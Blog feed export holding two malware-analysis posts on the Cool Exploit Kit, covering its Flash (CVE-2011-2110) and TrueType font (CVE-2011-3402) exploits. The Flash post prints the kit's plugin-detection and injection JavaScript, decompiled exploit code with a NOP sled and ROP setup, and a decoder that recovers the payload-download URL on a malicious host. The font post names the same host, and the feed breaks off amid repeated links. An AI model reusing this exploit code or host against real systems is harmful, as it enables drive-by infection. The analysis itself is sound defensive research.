tag:blogger.com,1999:blog-166414722024-03-12T19:32:40.199-07:00a bunch of random security bits!yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.comBlogger25125tag:blogger.com,1999:blog-16641472.post-78019192836462008922012-11-30T11:23:00.000-08:002012-12-06T11:27:01.181-08:00Flash exploit (CVE-2011-2110) and Cool Exploit Kit<div dir="ltr" style="text-align: left;" trbidi="on">
The Cool Exploit kit is using two flash vulnerabilities for the exploits. In this particular post, The vulnerability for CVE-2011-2110 will be analyzed. The post will highlight on analyzing the attack using flash exploit instead of detail on the vulnerability of CVE-2011-2110. ARTeam has a great writeup explaining on CVE-2011-2110 <a href="http://www.accessroot.com/arteam/site/download.php?view.331" target="_blank">here</a>. For this blogpost, the focus start is still the index page of Cool Exploit Kit<br />
<br />
The JavaScript retrieved from index page is as below<br />
<pre class="brush: js">//JS code from Index's page. Only relavent code associated with Flash attack will be
//showed
//<snip><snip>....<snip><snip><snip>
function ShowPDF() {
var pdf = (PluginDetect.getVersion("AdobeReader") + ".").toString().split(".");
var vver = "";
if (pdf[0] < 8) {
vver = "old";
setTimeout("FlashExploit()", 8003);
} else if (pdf[0] == 8 || (pdf[0] == 9 && pdf[1] < 4)) {
vver = "new";
setTimeout("FlashExploit()", 7004);
} else {
//<F1><EB><F3><E4><F3><FE><F9><E8><E9> <FD><EA><F1><EF><EB><EE><E9><F2>
FlashExploit();
}
if (vver != "") {
var d = document.createElement("div");
d.innerHTML = '<iframe src="../media/pdf_' + vver + '.php"></iframe>';
document.body.appendChild(d);
}
}
function FlashExploit() {
var ver = ($$.getVersion("Flash") + ".").toString().split(".");
if (((ver[0] == 10 && ver[1] == 0 && ver[2] > 40) || ((ver[0] == 10 && ver[1] > 0) && (ver[0] == 10 && ver[1] < 2))) || ((ver[0] == 10 && ver[1] == 2 && ver[2] < 159) || (ver[0] == (11 - 1) && ver[1] < 2))) {
var oSpan = document.createElement("span");
document.body.appendChild(oSpan);
oSpan.innerHTML = "<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='../media/field.swf' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='../media/field.swf' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
} else if ((ver[0] == 10 && ver[1] == 3 && ver[2] == 181 && ver[3] <= 23) || (ver[0] == 10 && ver[1] == 3 && ver[2] < 181)) {
var oSpan = document.createElement("span");
document.body.appendChild(oSpan);
var avmurl = "02e6b1525353caa8ad555330b65154b25550abb1b25633b6315350b7a93134ac55a835a951b252ca3556b1cf4f7e7a1c2075a8";
oSpan.innerHTML = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' id='asd' width='600' height='400' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='../media/flash.swf?info=" + avmurl + "' /><embed src='../media/flash.swf?info=" + avmurl + "' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>"
}
}
//<snip><snip>....<snip></snip></snip></pre>
<br />
The function of FlashExploit() will be triggered after pdf attacks related executed. The analysis will be on FlashExploit().<br />
<br />
Upon inspecting FlashExploit(), two different flash files are prepared. Depending on version target different file will be loaded. In this article, the flash file will be analyzed is the one loaded to match with these versions or lesser than 10.3.181.24 or lesser than 10.3.181<br />
<br />
In the setup for loading the flash, one parameter <span style="font-family: Courier New, Courier, monospace;">avmurl</span> is initialize and assigned to:<br />
<br />
<br />
<pre class="brush: as3">var avmurl = "02e6b1525353caa8ad555330b65154b25550abb1b25633b6315350b7a93134ac55a835a951b252ca3556b1cf4f7e7a1c2075a8"</pre>
Inspecting further, the flash file, located at (../media/flash.swf) will receive the avmurl as the first parameter. The analysis of the flash.swf file is required to understand the what it will do with <span style="white-space: normal;"><span style="font-family: Courier New, Courier, monospace;">avmurl </span></span><span style="font-family: Times; white-space: normal;">parameter. </span>
Partial AS3 code below is belong to flash.swf file after decompiled
<br />
<pre class="brush: as3">//<snip>
package
{
public class Main extends flash.display.MovieClip
{
public function Main()
{
var i:uint = 0;
var loader:URLLoader = null;
var onLoadComplete:Function = null;
var onLoadComplete:Function = function(arg0:flash.events.Event):void
{
var local1:*;
content = loader.data;
i = 0;
while(i < content.length)
{
content[i] = (content[i]) ^ 122;
local1 = i + 1;
i = local1;
}
content.uncompress();
content_len = content.length;
var local0:* = new ByteArray();
code = local0;
local0.position = 1024 * 1024;
local0.writeInt(2053274210);
local0.writeInt(2053339747);
local0.writeInt(2053405283);
local0.writeObject(local0);
exploit(local0, local0);
trace(local0.length);
};
var param:* = root.loaderInfo.parameters;
var t_url:hexToBin = param[((('i') + ('n')) + ('f')) + ('o')];
while(i < t_url.length)
{
t_url[i] = (t_url[i]) ^ 122;
var i:uint = i + 1;
}
t_url.uncompress();
//<snip><snip>....<snip><snip><snip>
</snip></snip></snip></pre>
At line number 35, the code retrieved a paramater from "info" which indeed belong to passed parameter from JavaScript code. The info paramater will be converted from hex to bin and will be XOR with 122 key. The xor'ed param will be uncompressed (Flash is using zlib library for decompression) next. By knowing this details, we can now inspect what is actually "info" paramater is. In this example, a ruby approach is choose to demonstrate the implementation (it seems code in ruby is much easier to implement as oppose to setup AS3 development set, if you already have the as3 ready, just copy-paste the relavant code sample). Below is the ruby code to achieve the same logic:<br />
<br />
<pre class="brush: ruby">//ruby code to mimic the AS3 code for manipulating "info" param
require 'zlib'
info="02e6b1525353caa8ad555330b65154b25550abb1b25633b6315350b7a93134ac55a835a951b252ca3556b1cf4f7e7a1c2075a8"
data=""
info.scan(/../) { |a| data << (a.to_i(16)^122)}
puts Zlib::Inflate.inflate(data)
</pre>
Run the code with:
<br />
<pre class="brush: bash">shell>$ruby infoswf.rb
http://transport.hitandrun.cc/r/f.php?avm=1
</pre>
<br />
The result of "info" manipulation seems to be an URL. The URL will be used by code as showed on code snippet below:<br />
<br />
<pre class="brush: as3">//<snip>..<snip>
{
error_arr.uncompress();
}
}
}
var url_str:String = t_url;
var loader:URLLoader = new URLLoader();
loader.dataFormat = URLLoaderDataFormat.BINARY;
loader.addEventListener(Event.COMPLETE, onLoadComplete);
loader.load(new URLRequest(t_url.toString()));
}
//<snip>..<snip>
</pre>
Further analysis as3 code revealed that the URL contains a xor with 122 key shellcode.
The as3 code snippet below showed the URL will be downloaded and XOR with 122.
<br />
<pre class="brush: as3">//<snip>..<snip>
public
function Main() {
var i: uint = 0;
var loader: URLLoader = null;
var onLoadComplete: Function = null;
var onLoadComplete: Function = function (arg0: flash.events.Event): void {
var local1: * ;
content = loader.data;
i = 0;
while (i & lt; content.length) {
content[i] = (content[i]) ^ 122;
local1 = i + 1;
i = local1;
}
content.uncompress();
content_len = content.length;
var local0: * = new ByteArray();
code = local0;
local0.position = 1024 * 1024;
local0.writeInt(2053274210);
local0.writeInt(2053339747);
local0.writeInt(2053405283);
local0.writeObject(local0);
exploit(local0, local0);
trace(local0.length);
};
//<snip>..<snip>
</pre>
The as3 code snippet below showed is basically the exploit code to trigger the vulnerability of CVE-2011-2110 and setup the NOP Sled.
<br />
<pre class="brush: as3">//<snip>..<snip>
public function exploit(): void {
var uint1: uint = 0;
var local2: * = this.code;
//Trigger the 1st memory leak
var number1: Number = new Number(parseFloat(String(local0[1073741841])));
var local4: * = new ByteArray(); < dup > new ByteArray().position = 0;
local4.writeDouble(number1);
var local5: * = ((((local4[0]) * 16777216) + ((local4[1]) * 65536)) + ((local4[2]) * 256)) + (local4[3]);
this.baseaddr = local5;
local2.position = 0;
local2.endian = Endian.LITTLE_ENDIAN;
local2.writeInt(((this.pobj - 1) + 16) + ((1024 * 4) * 100));
local2.endian = Endian.BIG_ENDIAN;
local2.writeUnsignedInt(1094861636);
local2.writeUnsignedInt(1094861636);
local2.writeUnsignedInt(1162233672);
uint1 = 0;
//setup NOP Sled 41414141
while (uint1 < 1024 * 100) {
local2.writeUnsignedInt(1094795585);
uint1 = uint1 + 1;
}
//<snip>..<snip>
//ROPing
local2.endian = Endian.LITTLE_ENDIAN;
local2.writeUnsignedInt(this.inc_eax_ret + 1);
local2.endian = Endian.BIG_ENDIAN;
local2.endian = Endian.LITTLE_ENDIAN;
local2.writeUnsignedInt(this.inc_eax_ret + 1);
local2.endian = Endian.BIG_ENDIAN;
local2.endian = Endian.LITTLE_ENDIAN;
local2.writeUnsignedInt(this.inc_eax_ret + 1);
local2.endian = Endian.BIG_ENDIAN;
local2.endian = Endian.LITTLE_ENDIAN;
local2.writeUnsignedInt(this.inc_eax_ret + 1);
local2.endian = Endian.BIG_ENDIAN;
local2.endian = Endian.LITTLE_ENDIAN;
local2.writeUnsignedInt(this.inc_eax_ret + 1);
local2.endian = Endian.BIG_ENDIAN;
local2.endian = Endian.LITTLE_ENDIAN;
local2.writeUnsignedInt(this.inc_eax_ret + 1);
local2.endian = Endian.BIG_ENDIAN;
//<snip>..<snip>
//9090 NOP Sled
local2.writeUnsignedInt(2425393296);
local2.writeUnsignedInt(2425393296);
local2.writeUnsignedInt(2425393296);
local2.writeUnsignedInt(2425393296);
local2.writeUnsignedInt(2425393296);
local2.writeUnsignedInt(2425393296);
local2.endian = Endian.BIG_ENDIAN;
//write XOR'ed data with 122 key retrieved from the URL (info)
local2.writeBytes(this.content, 0, this.content.length);
//<snip>..<snip>
//Trigger another memory leak
var number2: Number = new Number(parseFloat(String(local0[1073741741])));
var local7: * = new ByteArray();
//<snip>..<snip>
</pre>
Inspecting the code further reveal a similarity of metasploit's module for "adobe_flashplayer_arrayindexing".<br />
<br />
The next post will be on malicious PDF or another Flash vulnerability. </div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-39633939067999098532012-11-28T00:46:00.001-08:002012-12-06T11:25:52.175-08:00CVE-2011-3402 and Cool Exploit Kit<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I have been working with the Cool Exploit Kits payloads (attack vectors, rather, for the pass few days. The attack vectors consist of multiple vectors such as Flash, Java, PDF, Font and . It's interesting to see how the exploit kit is having probably the latest exploits released in public and also a 0day for Java vulnerability. The Cool Exploit kits is very stand out from many exploit kits due to Java 0day (please read the awesome article by @kafeine on the Java 0day analysis <a href="http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html" target="_blank">here</a>). @kafeine also wrote a post on the Cool Exploit kits architecture <a href="http://malware.dontneedcoffee.com/2012/10/newcoolek.html" target="_blank">here</a>. So, i'll try to write multiple articles and only concentrating on analysis of these particular vulnerabilities used within the exploit kit: CVE-2011-3402 for TTF font, CVE2010-0188 for LibTIFF on Adobe's PDF, and CVE-2011-2110 for AVM bytecode confusion on Adobe's Flash. In this post, I'll focus on CVE2011-3402.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The analysis start with inspecting index's file retrieved from main page hosting the exploit kit. I'm using <a href="https://github.com/buffer/thug" target="_blank">Thug</a> ( a honeyclient honeypot, develop by Angello 'buffer' Dell'Aera) to speed up my analysis (so much thing to do when it comes to de-obfuscation of Javascript, ;P). Please refer <span class="GRcorrect" grphrase="5ad646c84d714f15aef616eadd975204e88ee5bb" grtype="null" id="GRmark_5ad646c84d714f15aef616eadd975204e88ee5bb_for:0">for</span> documentation on how to setup Thug and how to use it. Below is the Figure 1.0 screenshot of the result of page rendering.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhexoVENsr6-qz5_ouyiBrS3QG7keGGsUaabQPoFyE8CiBWw4KV-d0Pm49d20f6v51lH3rPZhtUJFPzFY7uQSWdITMsYZDzHvsw1cn93c5JoagkBONiMD-rKJ2HJ2VJASguJM0l/s1600/cve_2011-3402_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhexoVENsr6-qz5_ouyiBrS3QG7keGGsUaabQPoFyE8CiBWw4KV-d0Pm49d20f6v51lH3rPZhtUJFPzFY7uQSWdITMsYZDzHvsw1cn93c5JoagkBONiMD-rKJ2HJ2VJASguJM0l/s400/cve_2011-3402_5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
Figure 1.0: Result from Thug showed the setup for @font-face pointing to font file at .<span class="GRcorrect" grphrase="8fd2812767b38acb1b0585d914a5151be3d0bb9c" grtype="null" id="GRmark_8fd2812767b38acb1b0585d914a5151be3d0bb9c_.:0">.</span>/32size_font<span class="GRcorrect" grphrase="8fd2812767b38acb1b0585d914a5151be3d0bb9c" grtype="null" id="GRmark_8fd2812767b38acb1b0585d914a5151be3d0bb9c_.:1">.</span><span class="GRcorrect" grphrase="8fd2812767b38acb1b0585d914a5151be3d0bb9c" grtype="null" id="GRmark_8fd2812767b38acb1b0585d914a5151be3d0bb9c_eot:2">eot</span> with <span class="GRcorrect" grphrase="8fd2812767b38acb1b0585d914a5151be3d0bb9c" grtype="null" id="GRmark_8fd2812767b38acb1b0585d914a5151be3d0bb9c_later:3">later</span> being applied to "<span class="GRcorrect" grphrase="8fd2812767b38acb1b0585d914a5151be3d0bb9c" grtype="null" id="GRmark_8fd2812767b38acb1b0585d914a5151be3d0bb9c_duqu:4">duqu</span>" CSS style</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The one interesting part of the Figure 1.0 is the word of "<span class="GRcorrect" grphrase="14b76b016e002cbdf80e113836a1d5c48e0c5697" grtype="null" id="GRmark_14b76b016e002cbdf80e113836a1d5c48e0c5697_duqu:0">duqu</span>". The IE font-face will fetch a remote font specified by the "<span class="GRcorrect" grphrase="a6d46480924c3ce8347e77ed1fb6ddce6a8317fe" grtype="null" id="GRmark_a6d46480924c3ce8347e77ed1fb6ddce6a8317fe_src:0">src</span><span class="GRcorrect" grphrase="a6d46480924c3ce8347e77ed1fb6ddce6a8317fe" grtype="null" id="GRmark_a6d46480924c3ce8347e77ed1fb6ddce6a8317fe_::1">:</span>url" parameter which pointing to .<span class="GRcorrect" grphrase="a6d46480924c3ce8347e77ed1fb6ddce6a8317fe" grtype="null" id="GRmark_a6d46480924c3ce8347e77ed1fb6ddce6a8317fe_.:2">.</span>/32size_font<span class="GRcorrect" grphrase="a6d46480924c3ce8347e77ed1fb6ddce6a8317fe" grtype="null" id="GRmark_a6d46480924c3ce8347e77ed1fb6ddce6a8317fe_.:3">.</span><span class="GRcorrect" grphrase="a6d46480924c3ce8347e77ed1fb6ddce6a8317fe" grtype="null" id="GRmark_a6d46480924c3ce8347e77ed1fb6ddce6a8317fe_eot:4">eot</span>. A CSS style for the font-face using a font of .<span class="GRcorrect" grphrase="254b7d1d839de7cc53e5152e9fb0fd7738797f60" grtype="null" id="GRmark_254b7d1d839de7cc53e5152e9fb0fd7738797f60_.:0">.</span>/32size_font<span class="GRcorrect" grphrase="254b7d1d839de7cc53e5152e9fb0fd7738797f60" grtype="null" id="GRmark_254b7d1d839de7cc53e5152e9fb0fd7738797f60_.:1">.</span><span class="GRcorrect" grphrase="254b7d1d839de7cc53e5152e9fb0fd7738797f60" grtype="null" id="GRmark_254b7d1d839de7cc53e5152e9fb0fd7738797f60_eot:2">eot</span> then sets to "<span class="GRcorrect" grphrase="254b7d1d839de7cc53e5152e9fb0fd7738797f60" grtype="null" id="GRmark_254b7d1d839de7cc53e5152e9fb0fd7738797f60_duqu:3">duqu</span>". The "<span class="GRcorrect" grphrase="48d3451d413683a32a1e12bbe318c8d93959144f" grtype="null" id="GRmark_48d3451d413683a32a1e12bbe318c8d93959144f_duqu:0">duqu</span>" style is important to understand because, in order to trigger the vulnerability in the font system, the font need to be called by the browser which later will call font engine (Win32k). Figure 1.0 [3], showed how the the style of <span class="GRcorrect" grphrase="aff4bdd2e01b7feb2ab0d86cedb4d0688a4ba0c9" grtype="null" id="GRmark_aff4bdd2e01b7feb2ab0d86cedb4d0688a4ba0c9_duqu:0">duqu</span> being rendered. Wasn't it cute when the smiley chars ":)" being showed in our browser?. I'll explain about this later.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The next step for the analysis is to download the 32size_font<span class="GRcorrect" grphrase="ec1bb66b2f013638cf4fab2815e2bc800fedacbb" grtype="null" id="GRmark_ec1bb66b2f013638cf4fab2815e2bc800fedacbb_.:0">.</span><span class="GRcorrect" grphrase="ec1bb66b2f013638cf4fab2815e2bc800fedacbb" grtype="null" id="GRmark_ec1bb66b2f013638cf4fab2815e2bc800fedacbb_eot:1">eot</span> for further analysis. The url for the 32size_font<span class="GRcorrect" grphrase="8379f68bec6499d5be39e43fd558c81faabfd90d" grtype="null" id="GRmark_8379f68bec6499d5be39e43fd558c81faabfd90d_.:0">.</span><span class="GRcorrect" grphrase="8379f68bec6499d5be39e43fd558c81faabfd90d" grtype="null" id="GRmark_8379f68bec6499d5be39e43fd558c81faabfd90d_eot:1">eot</span> is http://hosted_ip/r/32size_font.eot. In one of my analysis, <span class="GRcorrect" grphrase="429e5c8e92aa529a5ae5454e97838b38683a7eb5" grtype="null" id="GRmark_429e5c8e92aa529a5ae5454e97838b38683a7eb5_i:0">i</span> downloaded it via URL http://transport.hitandrun.cc/r/32size_font.eot. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The Embedded OpenType File Format (EOT) was developed by Microsoft to enable TrueType and OpenType fonts to be linked to web pages for download to render the web page with the font. The understanding EOT format is crucial in order to reconstruct the original font. Please read a good <span class="GRcorrect" grphrase="19a53ce786445306cadd0ef12d976065c615f0b9" grtype="null" id="GRmark_19a53ce786445306cadd0ef12d976065c615f0b9_specifacation:0">specifacation</span> from Microsoft on EOT <span class="GRspelling" grtype="null">specification</span> <a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank"></a><a href="http://www.w3.org/Submission/EOT/" target="_blank">here</a>. The EOT is a mere container to enable the TTF font to be loaded into the application (in this case is a browser), thus triggering vulnerability inside a TTF font rendering system (Win32k). Figure 2.0 showed a basic information about the downloaded file. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQXfjEtQyuWZ5_itJp-zEOHAdhIHN20R4p9Btu1MwDbftwe3_nN_vecK02t93hyHW2_PiiaH6neMcJMvuDfNaa5DzV2tcMGcZpYcG7daQyeR4zjWOHpacfuxm4UjwM95FShcyT/s1600/cve_2011-3402_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQXfjEtQyuWZ5_itJp-zEOHAdhIHN20R4p9Btu1MwDbftwe3_nN_vecK02t93hyHW2_PiiaH6neMcJMvuDfNaa5DzV2tcMGcZpYcG7daQyeR4zjWOHpacfuxm4UjwM95FShcyT/s320/cve_2011-3402_7.png" width="320" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;">Figure 2.0: Basic information for the 32size_font<span class="GRcorrect" grphrase="3e9c367c417c6500e89cc57d3dca8345240f0b12" grtype="null" id="GRmark_3e9c367c417c6500e89cc57d3dca8345240f0b12_.:0">.</span><span class="GRcorrect" grphrase="3e9c367c417c6500e89cc57d3dca8345240f0b12" grtype="null" id="GRmark_3e9c367c417c6500e89cc57d3dca8345240f0b12_eot:1">eot</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
The FullName and FamilyName for the <span class="GRcorrect" grphrase="5bfe9cb082441f14973ba14f05caaf35d318c7a5" grtype="null" id="GRmark_5bfe9cb082441f14973ba14f05caaf35d318c7a5_font:0">font</span> sounds familiar. Symantec's report on Duqu pointed <span class="GRcorrect" grphrase="302e0171cbcbcbc08a3318c3ed00b731b3c7e796" grtype="null" id="GRmark_302e0171cbcbcbc08a3318c3ed00b731b3c7e796_our:0">out</span> about the font name used within the Duqu attack is called Dexter. The FontDataSize value is 4004 bytes which represent the size of the embedded font. Based on the Figure 2.0 result, <span class="GRcorrect" grphrase="6f424ad531569f780adc41dfbb34eeef93370d16" grtype="null" id="GRmark_6f424ad531569f780adc41dfbb34eeef93370d16_i:0">I</span>'m a bit curious about the "Flags" when "not-compressed" is presented. When checking the embedded font data, I failed to recognize any TTF metadata presented. So, I decided to <span class="GRcorrect" grphrase="65bc3c84a79f18a8ac36704752a7d7feb422913d" grtype="null" id="GRmark_65bc3c84a79f18a8ac36704752a7d7feb422913d_wrote:0">write</span> a new EOT file <span class="GRcorrect" grphrase="65bc3c84a79f18a8ac36704752a7d7feb422913d" grtype="null" id="GRmark_65bc3c84a79f18a8ac36704752a7d7feb422913d_parse:1">parser</span><span class="GRcorrect" grphrase="65bc3c84a79f18a8ac36704752a7d7feb422913d" grtype="null" id="GRmark_65bc3c84a79f18a8ac36704752a7d7feb422913d_parse:1"></span>. Figure 3.0 showed the result of my EOT parser. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgowCewedBDC2IHf-BmlhDgJKArrgTsScGJh6KWxb7hEIZc6TEcLjvHAILbPQcRxZbPq2QM-zX4XA0b-2mEO-BxCxshNP9B1Q2fpIM7dt1JHNgagXtyBqBRTMDjTRozo6YLk5B3/s1600/cve_2011-3402_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgowCewedBDC2IHf-BmlhDgJKArrgTsScGJh6KWxb7hEIZc6TEcLjvHAILbPQcRxZbPq2QM-zX4XA0b-2mEO-BxCxshNP9B1Q2fpIM7dt1JHNgagXtyBqBRTMDjTRozo6YLk5B3/s320/cve_2011-3402_9.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;">Figure 3.0 showed the result </span><span style="text-align: justify;"><span class="GRcorrect" grphrase="d5b9b7db6ff6f6a26fd15fe844963f394736c529" grtype="null" id="GRmark_d5b9b7db6ff6f6a26fd15fe844963f394736c529_from:0">of</span></span><span style="text-align: justify;"> the <span class="GRcorrect" grphrase="d5b9b7db6ff6f6a26fd15fe844963f394736c529" grtype="null" id="GRmark_d5b9b7db6ff6f6a26fd15fe844963f394736c529_new EOT parse:1">new EOT parser</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
The new parser will parse the metadata of EOT file and will dump the embedded font into a new file. In this case, it will dump into Dexter. As for the flag, it showed a different result which has now been "tt_compressed" instead of "not_compressed". This result showed the embedded TTF font is compressed. According to Microsoft EOF specification, the compression algorithm used is the MicroType® Express algorithm. Based on this information, the Dexter file is required to be decompressed to retrieve the <span class="GRcorrect" grphrase="c13c3d3a0a2d5aed64eac2bd08b64d81df7082d1" grtype="null" id="GRmark_c13c3d3a0a2d5aed64eac2bd08b64d81df7082d1_uncompress:0">uncompress</span> TTF font. Once the Dexter file is <span class="GRcorrect" grphrase="a92b0d16d3078ccfef5f68b33f957d5bb2b045dc" grtype="null" id="GRmark_a92b0d16d3078ccfef5f68b33f957d5bb2b045dc_uncompressed:0">uncompressed</span>, the TTF metadata can be showed as shown in Figure 4.0. </div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCuEbKXYkQbI9YcRm7QPd6kIojOGsjk8skwRIXDqLOvS8qLOOAyvIa4xQxg16uIir4_LrRhj3YajwuEOdQ6-FRUZ5B4qeXD3lILGwBDx7saSg8ai5NPIyv6pRiAppRF9SQjGwo/s1600/cve_2011-3402_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCuEbKXYkQbI9YcRm7QPd6kIojOGsjk8skwRIXDqLOvS8qLOOAyvIa4xQxg16uIir4_LrRhj3YajwuEOdQ6-FRUZ5B4qeXD3lILGwBDx7saSg8ai5NPIyv6pRiAppRF9SQjGwo/s320/cve_2011-3402_10.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
Figure 4.0 showed <span style="text-align: justify;">TTF metadata</span></div>
<br />
The next step is to analyze on the Dexter TTF font. A good documentation on CVE-2011-3402 and <span class="GRcorrect" grphrase="c5bbaa8e03f1b3c6f78b801c6f3b6510fa8cd0e7" grtype="null" id="GRmark_c5bbaa8e03f1b3c6f78b801c6f3b6510fa8cd0e7_it:0">it</span> exploitation possibility are described in a great detail from BlackHat Europe 2012 presentation (From Lee Ling Chuan aka lclee_vx) which can be downloaded from <a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Slides.pdf" target="_blank">here</a> and <a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" 